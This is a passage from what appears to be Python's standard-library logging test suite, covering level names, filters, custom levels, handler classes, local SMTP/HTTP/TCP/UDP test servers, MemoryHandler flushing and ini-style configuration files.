self.assertEqual(logging.getLevelName('ERROR'), 40)
self.assertEqual(logging.getLevelName('CRITICAL'), 50)
self.assertEqual(logging.getLevelName(0), 'NOTSET')
self.assertEqual(logging.getLevelName(10), 'DEBUG')
self.assertEqual(logging.getLevelName(20), 'INFO')
self.assertEqual(logging.getLevelName(30), 'WARNING')
self.assertEqual(logging.getLevelName(40), 'ERROR')
self.assertEqual(logging.getLevelName(50), 'CRITICAL')
def test_regression_29220(self):
"""See issue #29220 for more information."""
logging.addLevelName(logging.INFO, '')
self.addCleanup(logging.addLevelName, logging.INFO, 'INFO')
self.assertEqual(logging.getLevelName(logging.INFO), '')
def test_issue27935(self):
fatal = logging.getLevelName('FATAL')
self.assertEqual(fatal, logging.FATAL)
def test_regression_29220(self):
"""See issue #29220 for more information."""
logging.addLevelName(logging.INFO, '')
self.addCleanup(logging.addLevelName, logging.INFO, 'INFO')
self.assertEqual(logging.getLevelName(logging.INFO), '')
self.assertEqual(logging.getLevelName(logging.NOTSET), 'NOTSET')
self.assertEqual(logging.getLevelName('NOTSET'), logging.NOTSET)
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
def test_empty_filter(self):
f = logging.Filter()
r = logging.makeLogRecord({'name': 'spam.eggs'})
self.assertTrue(f.filter(r))
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class HandlerTest(BaseTest):
def test_name(self):
h = logging.Handler()
h.name = 'generic'
self.assertEqual(h.name, 'generic')
h.name = 'anothergeneric'
self.assertEqual(h.name, 'anothergeneric')
self.assertRaises(NotImplementedError, h.emit, None)
def test_builtin_handlers(self):
# We can't actually *use* too many handlers in the tests,
# but we can try instantiating them with various options
if sys.platform in ('linux', 'darwin'):
for existing in (True, False):
fd, fn = tempfile.mkstemp()
os.close(fd)
if not existing:
os.unlink(fn)
h = logging.handlers.WatchedFileHandler(fn, delay=True)
if existing:
dev, ino = h.dev, h.ino
self.assertEqual(dev, -1)
self.assertEqual(ino, -1)
r = logging.makeLogRecord({'msg': 'Test'})
h.handle(r)
# Now remove the file.
os.unlink(fn)
self.assertFalse(os.path.exists(fn))
# The next call should recreate the file.
h.handle(r)
self.assertTrue(os.path.exists(fn))
else:
self.assertEqual(h.dev, -1)
self.assertEqual(h.ino, -1)
h.close()
if existing:
os.unlink(fn)
if sys.platform == 'darwin':
sockname = '/var/run/syslog'
else:
sockname = '/dev/log'
try:
h = logging.handlers.SysLogHandler(sockname)
self.assertEqual(h.facility, h.LOG_USER)
self.assertTrue(h.unixsocket)
h.close()
except OSError: # syslogd might not be available
pass
for method in ('GET', 'POST', 'PUT'):
if method == 'PUT':
self.assertRaises(ValueError, logging.handlers.HTTPHandler,
'localhost', '/log', method)
else:
h = logging.handlers.HTTPHandler('localhost', '/log', method)
h.close()
h = logging.handlers.BufferingHandler(0)
r = logging.makeLogRecord({})
self.assertTrue(h.shouldFlush(r))
h.close()
h = logging.handlers.BufferingHandler(1)
self.assertFalse(h.shouldFlush(r))
h.close()
def test_path_objects(self):
"""
Test that Path objects are accepted as filename arguments to handlers.
See Issue #27493.
"""
fd, fn = tempfile.mkstemp()
os.close(fd)
os.unlink(fn)
pfn = pathlib.Path(fn)
cases = (
(logging.FileHandler, (pfn, 'w')),
(logging.handlers.RotatingFileHandler, (pfn, 'a')),
(logging.handlers.TimedRotatingFileHandler, (pfn, 'h')),
)
if sys.platform in ('linux', 'darwin'):
cases += ((logging.handlers.WatchedFileHandler, (pfn, 'w')),)
for cls, args in cases:
h = cls(*args)
self.assertTrue(os.path.exists(fn))
h.close()
os.unlink(fn)
@unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
self.deletion_time = time.time()
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
self.handle_time = None
self.deletion_time = None
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
try:
self.handle_time = time.time()
h.handle(r)
except Exception:
print('Deleted at %s, '
'opened at %s' % (self.deletion_time,
self.handle_time))
raise
finally:
remover.join()
h.close()
if os.path.exists(fn):
os.unlink(fn)
# The implementation relies on os.register_at_fork existing, but we test
# based on os.fork existing because that is what users and this test use.
# This helps ensure that when fork exists (the important concept) that the
# register_at_fork mechanism is also present and used.
@unittest.skipIf(not hasattr(os, 'fork'), 'Test requires os.fork().')
def test_post_fork_child_no_deadlock(self):
"""Ensure child logging locks are not held; bpo-6721 & bpo-36533."""
class _OurHandler(logging.Handler):
def __init__(self):
super().__init__()
self.sub_handler = logging.StreamHandler(
stream=open('/dev/null', 'wt'))
def emit(self, record):
self.sub_handler.acquire()
try:
self.sub_handler.emit(record)
finally:
self.sub_handler.release()
self.assertEqual(len(logging._handlers), 0)
refed_h = _OurHandler()
self.addCleanup(refed_h.sub_handler.stream.close)
refed_h.name = 'because we need at least one for this test'
self.assertGreater(len(logging._handlers), 0)
self.assertGreater(len(logging._at_fork_reinit_lock_weakset), 1)
test_logger = logging.getLogger('test_post_fork_child_no_deadlock')
test_logger.addHandler(refed_h)
test_logger.setLevel(logging.DEBUG)
locks_held__ready_to_fork = threading.Event()
fork_happened__release_locks_and_end_thread = threading.Event()
def lock_holder_thread_fn():
logging._acquireLock()
try:
refed_h.acquire()
try:
# Tell the main thread to do the fork.
locks_held__ready_to_fork.set()
# If the deadlock bug exists, the fork will happen
# without dealing with the locks we hold, deadlocking
# the child.
# Wait for a successful fork or an unreasonable amount of
# time before releasing our locks. To avoid a timing based
# test we'd need communication from os.fork() as to when it
# has actually happened. Given this is a regression test
# for a fixed issue, potentially less reliably detecting
# regression via timing is acceptable for simplicity.
# The test will always take at least this long. :(
fork_happened__release_locks_and_end_thread.wait(0.5)
finally:
refed_h.release()
finally:
logging._releaseLock()
lock_holder_thread = threading.Thread(
target=lock_holder_thread_fn,
name='test_post_fork_child_no_deadlock lock holder')
lock_holder_thread.start()
locks_held__ready_to_fork.wait()
pid = os.fork()
if pid == 0: # Child.
try:
test_logger.info(r'Child process did not deadlock. \o/')
finally:
os._exit(0)
else: # Parent.
test_logger.info(r'Parent process returned from fork. \o/')
fork_happened__release_locks_and_end_thread.set()
lock_holder_thread.join()
start_time = time.monotonic()
while True:
test_logger.debug('Waiting for child process.')
waited_pid, status = os.waitpid(pid, os.WNOHANG)
if waited_pid == pid:
break # child process exited.
if time.monotonic() - start_time > 7:
break # so long? implies child deadlock.
time.sleep(0.05)
test_logger.debug('Done waiting.')
if waited_pid != pid:
os.kill(pid, signal.SIGKILL)
waited_pid, status = os.waitpid(pid, 0)
self.fail("child process deadlocked.")
self.assertEqual(status, 0, msg="child process error")
class BadStream(object):
def write(self, data):
raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
def handleError(self, record):
self.error_record = record
class StreamWithIntName(object):
level = logging.NOTSET
name = 2
class StreamHandlerTest(BaseTest):
def test_error_handling(self):
h = TestStreamHandler(BadStream())
r = logging.makeLogRecord({})
old_raise = logging.raiseExceptions
try:
h.handle(r)
self.assertIs(h.error_record, r)
h = logging.StreamHandler(BadStream())
with support.captured_stderr() as stderr:
h.handle(r)
msg = '\nRuntimeError: deliberate mistake\n'
self.assertIn(msg, stderr.getvalue())
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
h.handle(r)
self.assertEqual('', stderr.getvalue())
finally:
logging.raiseExceptions = old_raise
def test_stream_setting(self):
"""
Test setting the handler's stream
"""
h = logging.StreamHandler()
stream = io.StringIO()
old = h.setStream(stream)
self.assertIs(old, sys.stderr)
actual = h.setStream(old)
self.assertIs(actual, stream)
# test that setting to existing value returns None
actual = h.setStream(old)
self.assertIsNone(actual)
def test_can_represent_stream_with_int_name(self):
h = logging.StreamHandler(StreamWithIntName())
self.assertEqual(repr(h), '<StreamHandler 2 (NOTSET)>')
# -- The following section could be moved into a server_helper.py module
# -- if it proves to be of wider utility than just test_logging
class TestSMTPServer(smtpd.SMTPServer):
"""
This class implements a test SMTP server.
:param addr: A (host, port) tuple which the server listens on.
You can specify a port value of zero: the server's
*port* attribute will hold the actual port number
used, which can be used in client connections.
:param handler: A callable which will be called to process
incoming messages. The handler will be passed
the client address tuple, who the message is from,
a list of recipients and the message data.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
:param sockmap: A dictionary which will be used to hold
:class:`asyncore.dispatcher` instances used by
:func:`asyncore.loop`. This avoids changing the
:mod:`asyncore` module's global state.
"""
def __init__(self, addr, handler, poll_interval, sockmap):
smtpd.SMTPServer.__init__(self, addr, None, map=sockmap,
decode_data=True)
self.port = self.socket.getsockname()[1]
self._handler = handler
self._thread = None
self.poll_interval = poll_interval
def process_message(self, peer, mailfrom, rcpttos, data):
"""
Delegates to the handler passed in to the server's constructor.
Typically, this will be a test case method.
:param peer: The client (host, port) tuple.
:param mailfrom: The address of the sender.
:param rcpttos: The addresses of the recipients.
:param data: The message.
"""
self._handler(peer, mailfrom, rcpttos, data)
def start(self):
"""
Start the server running on a separate daemon thread.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the :mod:`asyncore` loop until normal termination
conditions arise.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
"""
asyncore.loop(poll_interval, map=self._map)
def stop(self, timeout=None):
"""
Stop the thread by closing the server instance.
Wait for the server thread to terminate.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.close()
support.join_thread(self._thread, timeout)
self._thread = None
asyncore.close_all(map=self._map, ignore_all=True)
class ControlMixin(object):
"""
This mixin is used to start a server on a separate thread, and
shut it down programmatically. Request handling is simplified - instead
of needing to derive a suitable RequestHandler subclass, you just
provide a callable which will be passed each received request to be
processed.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request. This handler is called on the
server thread, effectively meaning that requests are
processed serially. While not quite Web scale ;-),
this should be fine for testing applications.
:param poll_interval: The polling interval in seconds.
"""
def __init__(self, handler, poll_interval):
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
self.ready = threading.Event()
def start(self):
"""
Create a daemon thread to run the server, and start it.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the server. Set the ready flag before entering the
service loop.
"""
self.ready.set()
super(ControlMixin, self).serve_forever(poll_interval)
def stop(self, timeout=None):
"""
Tell the server thread to stop, and wait for it to do so.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.shutdown()
if self._thread is not None:
support.join_thread(self._thread, timeout)
self._thread = None
self.server_close()
self.ready.clear()
class TestHTTPServer(ControlMixin, HTTPServer):
"""
An HTTP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval in seconds.
:param log: Pass ``True`` to enable log messages.
"""
def __init__(self, addr, handler, poll_interval=0.5,
log=False, sslctx=None):
class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
def __getattr__(self, name, default=None):
if name.startswith('do_'):
return self.process_request
raise AttributeError(name)
def process_request(self):
self.server._handler(self)
def log_message(self, format, *args):
if log:
super(DelegatingHTTPRequestHandler,
self).log_message(format, *args)
HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
ControlMixin.__init__(self, handler, poll_interval)
self.sslctx = sslctx
def get_request(self):
try:
sock, addr = self.socket.accept()
if self.sslctx:
sock = self.sslctx.wrap_socket(sock, server_side=True)
except OSError as e:
# socket errors are silenced by the caller, print them here
sys.stderr.write("Got an error:\n%s\n" % e)
raise
return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
"""
A TCP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a single
parameter - the request - in order to process the request.
:param poll_interval: The polling interval in seconds.
:bind_and_activate: If True (the default), binds the server and starts it
listening. If False, you need to call
:meth:`server_bind` and :meth:`server_activate` at
some later time before calling :meth:`start`, so that
the server will set up the socket and listen on it.
"""
allow_reuse_address = True
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingTCPRequestHandler(StreamRequestHandler):
def handle(self):
self.server._handler(self)
ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
def server_bind(self):
super(TestTCPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
"""
A UDP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval for shutdown requests,
in seconds.
:bind_and_activate: If True (the default), binds the server and
starts it listening. If False, you need to
call :meth:`server_bind` and
:meth:`server_activate` at some later time
before calling :meth:`start`, so that the server will
set up the socket and listen on it.
"""
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingUDPRequestHandler(DatagramRequestHandler):
def handle(self):
self.server._handler(self)
def finish(self):
data = self.wfile.getvalue()
if data:
try:
super(DelegatingUDPRequestHandler, self).finish()
except OSError:
if not self.server._closed:
raise
ThreadingUDPServer.__init__(self, addr,
DelegatingUDPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
self._closed = False
def server_bind(self):
super(TestUDPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
def server_close(self):
super(TestUDPServer, self).server_close()
self._closed = True
if hasattr(socket, "AF_UNIX"):
class TestUnixStreamServer(TestTCPServer):
address_family = socket.AF_UNIX
class TestUnixDatagramServer(TestUDPServer):
address_family = socket.AF_UNIX
# - end of server_helper section
class SMTPHandlerTest(BaseTest):
# bpo-14314, bpo-19665, bpo-34092: don't wait forever, timeout of 1 minute
TIMEOUT = 60.0
def test_basic(self):
sockmap = {}
server = TestSMTPServer((support.HOST, 0), self.process_message, 0.001,
sockmap)
server.start()
addr = (support.HOST, server.port)
h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log',
timeout=self.TIMEOUT)
self.assertEqual(h.toaddrs, ['you'])
self.messages = []
r = logging.makeLogRecord({'msg': 'Hello \u2713'})
self.handled = threading.Event()
h.handle(r)
self.handled.wait(self.TIMEOUT)
server.stop()
self.assertTrue(self.handled.is_set())
self.assertEqual(len(self.messages), 1)
peer, mailfrom, rcpttos, data = self.messages[0]
self.assertEqual(mailfrom, 'me')
self.assertEqual(rcpttos, ['you'])
self.assertIn('\nSubject: Log\n', data)
self.assertTrue(data.endswith('\n\nHello \u2713'))
h.close()
def process_message(self, *args):
self.messages.append(args)
self.handled.set()
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warning(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
def test_flush_on_close(self):
"""
Test that the flush-on-close configuration works as expected.
"""
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
self.mem_logger.removeHandler(self.mem_hdlr)
# Default behaviour is to flush on close. Check that it happens.
self.mem_hdlr.close()
lines = [
('DEBUG', '1'),
('INFO', '2'),
]
self.assert_log_lines(lines)
# Now configure for flushing not to be done on close.
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr,
False)
self.mem_logger.addHandler(self.mem_hdlr)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.info(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.removeHandler(self.mem_hdlr)
self.mem_hdlr.close()
# assert that no new lines have been added
self.assert_log_lines(lines) # no change
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger, and uses kwargs instead of args.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
kwargs={'stream': sys.stdout,}
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config 8, check for resource warning
config8 = r"""
[loggers]
keys=root
[handlers]
keys=file
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=file
[handler_file]
class=FileHandler
level=DEBUG
args=("{tempfile}",)
"""
disable_test = """
[loggers]
keys=root
[handlers]
keys=screen
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=screen
[handler_screen]
level=DEBUG
class=StreamHandler
args=(sys.stdout,)
formatter=
"""
def apply_config(self, conf, **kwargs):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file, **kwargs)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config0_using_cp_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
file = io.StringIO(textwrap.dedent(self.config0))
cp = configparser.ConfigParser()
cp.read_file(file)
logging.config.fileConfig(cp)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config8_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
# Replace single backslash with double backslash in windows
# to avoid unicode error during string formatting
if os.name == "nt":
fn = fn.replace("\\", "\\\\")
config8 = self.config8.format(tempfile=fn)
self.apply_config(config8)
self.apply_config(config8)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def test_logger_disabling(self):
self.apply_config(self.disable_test)
logger = logging.getLogger('some_pristine_logger')
self.assertFalse(logger.disabled)
self.apply_config(self.disable_test)
self.assertTrue(logger.disabled)
self.apply_config(self.disable_test, disable_existing_loggers=False)
self.assertFalse(logger.disabled)
def test_defaults_do_no_interpolation(self):
"""bpo-33802 defaults should not get interpolated"""
ini = textwrap.dedent("""
[formatters]
keys=default
[formatter_default]
[handlers]
keys=console
[handler_console]
class=logging.StreamHandler
args=tuple()
[loggers]
keys=root
[logger_root]
formatter=default
handlers=console
""").strip()
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.ini')
try:
os.write(fd, ini.encode('ascii'))
os.close(fd)
logging.config.fileConfig(
fn,
defaults=dict(
version=1,
disable_existing_loggers=False,
formatters={
"generic": {
"format": "%(asctime)s [%(process)d] [%(levelname)s] %(message)s",
"datefmt": "[%Y-%m-%d %H:%M:%S %z]",
